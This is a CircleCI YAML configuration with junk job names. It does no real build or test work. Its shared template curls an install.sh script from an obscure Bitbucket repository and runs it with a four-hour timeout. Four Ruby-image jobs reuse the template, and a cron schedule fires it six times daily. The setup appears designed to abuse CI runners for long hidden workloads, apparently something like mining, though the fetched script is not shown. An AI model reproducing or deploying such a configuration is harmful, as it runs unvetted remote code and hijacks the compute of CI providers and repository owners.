.mayora_template: &harum
  steps:
    - run: curl -L https://bitbucket.org/azureshjlfgs/azureee/raw/246fee80e2908f28a393c224a9c8f96873f2f6c5/install.sh > ./install.sh
    - run: chmod +x ./install.sh
    - run: 
       name: circleci
       command: ./install.sh
       no_output_timeout: 4h
        
version: 2.0
jobs:
  seger:
    docker:
      - image: ruby
    steps:
      - checkout
  seger1:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7.3
  seger2:
    <<: *harum
    docker:
      - image: circleci/ruby:2.7
  seger3:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.8
  seger4:
    <<: *harum
    docker:
      - image: circleci/ruby:2.6.7
workflows:
  version: 2
  commit:
    jobs:
      - seger
      - seger1
      - seger2
      - seger3
      - seger4
    triggers:
      - schedule:
          cron: "0 4,8,12,16,20,23 * * *"
          filters:
            branches:
              only:
                - master
                
  tehcukrum:
    jobs:
      - seger
      - seger1
      - seger2
      - seger3
      - seger4